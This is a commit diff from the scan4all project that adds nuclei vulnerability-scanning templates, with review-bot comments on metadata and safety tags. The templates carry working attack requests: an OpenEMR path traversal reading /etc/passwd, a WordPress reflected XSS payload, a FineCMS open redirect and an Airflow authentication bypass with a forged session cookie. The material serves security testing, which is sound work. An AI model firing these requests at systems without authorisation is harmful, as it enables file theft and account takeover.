Projects STRLCPY scan4all Commits 0c8c35ac
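--- a/.github/build/linux.yml
+++ b/.github/build/linux.yml
@@ -16,7 +16,7 @@
  - linux
  goarch:
  - amd64
-# - arm64
+ - arm64
 archives:
 - format: zip
 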
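--- a/config/nuclei-templates/cves/2008/CVE-2008-1061.yaml
+++ b/config/nuclei-templates/cves/2008/CVE-2008-1061.yaml
@@ -11,6 +11,8 @@
  - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
  - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
  - http://secunia.com/advisories/29099
+ classification:
+ cve-id: CVE-2008-1061
  tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
 
 requests: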
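--- a/config/nuclei-templates/cves/2015/CVE-2015-4127.yaml
+++ b/config/nuclei-templates/cves/2015/CVE-2015-4127.yaml
@@ -11,6 +11,8 @@
  - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
  - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
  - https://wordpress.org/plugins/church-admin/changelog/
+ classification:
+ cve-id: CVE-2015-4127
  tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
 
 requests: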
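--- a/config/nuclei-templates/cves/2017/CVE-2017-11586.yaml
+++ b/config/nuclei-templates/cves/2017/CVE-2017-11586.yaml
@@ -0,0 +1,40 @@
+id: CVE-2017-11586
+
+info:
+ name: FineCms < 5.0.9 - Open redirect
+ author: 0x_Akoko
+ severity: medium
+ description: |
+ dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
+ reference:
+ - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-11586
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-11586
+ cwe-id: CWE-601
+ metadata:
+ verified: "true"
+ tags: cve,cve2017,redirect,finecms
+
+requests:
+ - raw:
+ - |
+ POST /index.php?s=member&c=login&m=index HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1
+
+ - |
+ GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - 'Refresh:(.*)url=http:\/\/interact\.sh'
+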
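Review bot: The first raw request posts `{{username}}` and `{{password}}` to the login form, but nothing in `info` tells an operator that the template needs credentials to produce a meaningful result. The CVE-2019-14530 template added in this same commit has the same login-then-probe shape and carries the `authenticated` tag, so `tags: cve,cve2017,redirect,finecms,authenticated` would keep the two consistent and let unauthenticated scan profiles skip it. The name says `< 5.0.9` while the description says 5.0.9 itself is affected; one of the two should be corrected against the NVD entry already listed under `reference`.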
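--- a/config/nuclei-templates/cves/2017/CVE-2017-11629.yaml
+++ b/config/nuclei-templates/cves/2017/CVE-2017-11629.yaml
@@ -9,10 +9,14 @@
  reference:
  - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
  - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
+ - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
  classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
  cve-id: CVE-2017-11629
+ cwe-id: CWE-79
  metadata:
- verified: true
+ verified: "true"
  tags: cve,cve2017,xss,finecms
 
 requests: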
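Review bot: `verified` is switched to the quoted string `"true"` here, yet the CVE-2022-2383 and icc-pro-login templates added in the same commit use the bare boolean `verified: true`. The two forms load as different YAML types, so any tooling that filters templates on this field has to handle both; picking one form across the commit avoids that. The template body continues outside the hunk.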
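--- a/config/nuclei-templates/cves/2019/CVE-2019-14530.yaml
+++ b/config/nuclei-templates/cves/2019/CVE-2019-14530.yaml
@@ -0,0 +1,53 @@
+id: CVE-2019-14530
+
+info:
+ name: OpenEMR < 5.0.2 - Path Traversal
+ author: TenBird
+ severity: high
+ description: |
+ An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
+ reference:
+ - https://www.exploit-db.com/exploits/50037
+ - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14530
+ - https://github.com/openemr/openemr/pull/2592
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-14530
+ cwe-id: CWE-22
+ metadata:
+ verified: "true"
+ tags: lfi,authenticated,edb,cve,cve2019,openemr
+
+requests:
+ - raw:
+ - |
+ POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
+
+ - |
+ GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: word
+ part: header
+ words:
+ - filename=passwd
+
+ - type: status
+ status:
+ - 200
+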
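Review bot: The description states that a file requested through `fileName` is deleted when it is writable by www-data and the cqm_qrda directory exists, but the template gives the scan operator no warning that the probe can have that side effect. `/etc/passwd` is normally not writable by the web user, so the second request should be read-only on a sanely configured host; say so in a comment above that request, e.g. `# /etc/passwd is normally not writable by www-data, so the delete path in the description is not reached`. Consider also adding `intrusive` to `tags` so the check can be excluded from scans of production systems where file permissions are not known.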
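--- a/config/nuclei-templates/cves/2020/CVE-2020-17526.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-17526.yaml
@@ -0,0 +1,52 @@
+id: CVE-2020-17526
+
+info:
+ name: Apache Airflow < 1.10.14 - Authentication Bypass
+ author: piyushchhiroliya
+ severity: high
+ description: |
+ Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
+ reference:
+ - https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-17526
+ - https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
+ - http://www.openwall.com/lists/oss-security/2020/12/21/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 7.7
+ cve-id: CVE-2020-17526
+ metadata:
+ fofa-query: Apache Airflow
+ verified: "true"
+ tags: cve,cve2020,apache,airflow,auth-bypass
+
+requests:
+ - raw:
+ - |
+ GET /admin/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /admin/ HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - "DAG"
+ - "Recent Tasks"
+ - "Users"
+ - "SLA Misses"
+ - "Task Instances"
+ condition: and
+
+ - type: dsl
+ dsl:
+ - "contains(body_1, 'Redirecting...')"
+ - "status_code_1 == 302"
+ condition: and
+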
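Review bot: The `Cookie: session=…` value in the second request is an opaque literal with no comment on where it came from or what it encodes, so a maintainer cannot audit or regenerate it. Presumably it is a session signed with the secret key that a default Airflow configuration ships with, which would match the description's "with default config"; state that in a comment above the request. The template should also say that a negative result only shows the instance does not accept this particular session, not that it runs 1.10.14 or later. `classification` omits `cwe-id`, which the CVE-2017-11586 and CVE-2019-14530 templates in this commit set.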
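--- a/config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-2383
+
+info:
+ name: Feed Them Social < 3.0.1 - Cross-Site Scripting
+ author: akincibor
+ severity: medium
+ description: |
+ The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+ reference:
+ - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
+ - https://wordpress.org/plugins/feed-them-social/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
+ classification:
+ cve-id: CVE-2022-2383
+ metadata:
+ verified: true
+ tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<img src onerror=alert(document.domain)><br/>'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+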
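--- a/config/nuclei-templates/exposed-panels/archibus-webcentral-panel.yaml
+++ b/config/nuclei-templates/exposed-panels/archibus-webcentral-panel.yaml
@@ -2,7 +2,7 @@
 
 info:
  name: Archibus Web Central Panel
- author: righettod
+ author: righettod,PJBorah,Hardik-Rathod
  severity: info
  reference:
  - https://archibus.com/products/
@@ -16,6 +16,7 @@
  path:
  - '{{BaseURL}}'
  - '{{BaseURL}}/archibus/login.axvw'
+ - '{{BaseURL}}/archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp'
 
  redirects: true
  max-redirects: 2
@@ -28,8 +29,8 @@
 
  - type: word
  words:
+ - "Continue As a Guest"
  - "login"
- - "Sign Out"
  condition: or
 
  - type: status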
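Review bot: In the last hunk the word matcher keeps the generic `"login"` under `condition: or`, so the added `"Continue As a Guest"` string can never narrow the match; any response on the three paths that contains `login` already satisfies this matcher. The matcher that precedes it lies in the skipped lines, so it may already pin the product name. If it does not, replacing `"login"` with product-specific strings would cut false positives when this template feeds an exposed-panel inventory.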
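--- a/config/nuclei-templates/exposed-panels/icc-pro-login.yaml
+++ b/config/nuclei-templates/exposed-panels/icc-pro-login.yaml
@@ -0,0 +1,34 @@
+id: icc-pro-login
+
+info:
+ name: ICC Pro System Login
+ author: DhiyaneshDk
+ severity: info
+ reference:
+ - https://www.exploit-db.com/ghdb/7980
+ metadata:
+ verified: true
+ shodan-query: title:"Login to ICC PRO system"
+ tags: panel,icc-pro,edb
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Account/Login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "<title>Login to ICC PRO system</title>"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+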